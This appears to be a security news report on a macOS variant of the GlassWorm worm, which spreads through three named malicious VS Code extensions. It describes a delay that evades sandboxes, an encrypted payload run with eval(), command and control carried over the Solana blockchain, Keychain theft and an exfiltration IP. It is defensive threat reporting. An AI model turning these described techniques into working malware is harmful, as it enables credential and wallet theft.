A new variant of the GlassWorm malware has been discovered, shifting its focus from Windows to macOS users and distributing through malicious Visual Studio Code (VS Code) extensions. This sophisticated self-propagating worm, downloaded over 50,000 times from the Open VSX marketplace, employs advanced techniques like encrypted payloads, hardware wallet trojanization, and robust sandbox evasion to bypass security measures. The threat actor demonstrates significant adaptability, marking the fourth distinct evolution of GlassWorm since its initial appearance in October.
Researchers have identified three malicious VS Code extensions, pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, on the Open VSX marketplace. These extensions share a common infrastructure and encryption keys, indicating a single source of development. The malware’s command and control (C2) infrastructure leverages the Solana blockchain, making traditional takedown methods like domain blocking ineffective. Transaction memos on the blockchain contain base64-encoded URLs, enabling decentralized control by the attacker.
Encrypted Payload and Sandbox Evasion Tactics
The latest iteration of GlassWorm distinguishes itself with an advanced sandbox evasion tactic. Once installed, the malicious extension deliberately delays its payload execution for precisely 15 minutes. This deliberate delay is a critical strategy, as most automated security analysis environments and sandboxes have a timeout period of around 5 minutes. Consequently, the malware appears dormant and benign during initial scans, evading detection.
The core of this evasion lies within the extension’s code. A hardcoded value of 9e5 milliseconds (equal to 15 minutes) triggers a JavaScript function that first decrypts the AES-256-CBC encrypted payload. The payload itself is embedded within the main extension file and is encrypted using a consistently used key and initialization vector across all three identified malicious extensions. This shared cryptographic material strongly confirms that a single threat actor is behind this sophisticated campaign. Following the decryption, the `eval()` function executes the reconstructed malicious JavaScript code.
After the mandated delay, the malware retrieves the current command and control server address from the Solana blockchain. It then proceeds to execute any instructions received from the attacker. The macOS-specific payloads are designed for stealth and persistence. Instead of Windows Registry keys, the malware utilizes macOS LaunchAgents to maintain its presence on an infected system. Furthermore, it includes capabilities to directly access and exfiltrate sensitive information stored within the macOS Keychain database. This includes stored passwords and other user credentials, which can be crucial for further network intrusion or credential stuffing attacks.
A particularly concerning capability introduced in this wave is the potential for hardware wallet trojanization. The malware has the infrastructure to replace legitimate hardware wallet applications, such as Ledger Live and Trezor Suite, with malicious, trojanized versions. While researchers observed on December 29, 2025, that this specific functionality was not fully active, the underlying code and payload upload mechanisms are in place, awaiting activation. To prevent detection of failed installations, the malware validates that any downloaded files exceed 1000 bytes before proceeding with installation. All exfiltrated data is staged in the temporary directory /tmp/ijewf/, compressed, and then transmitted to an attacker-controlled server located at 45.32.150.251/p2p.
The development of this malware highlights the continuously evolving threat landscape for macOS users. The shift in targeting, coupled with sophisticated evasion techniques and decentralized infrastructure, presents a significant challenge for cybersecurity professionals. The utilization of blockchain technology for C2 communication is a trend that is expected to grow, requiring new approaches to threat detection and response. Users of VS Code are strongly advised to exercise extreme caution when installing extensions, carefully reviewing their source, permissions, and recent activity. Monitoring the Open VSX marketplace for the removal of these malicious extensions and the emergence of similar threats will be crucial in the coming weeks.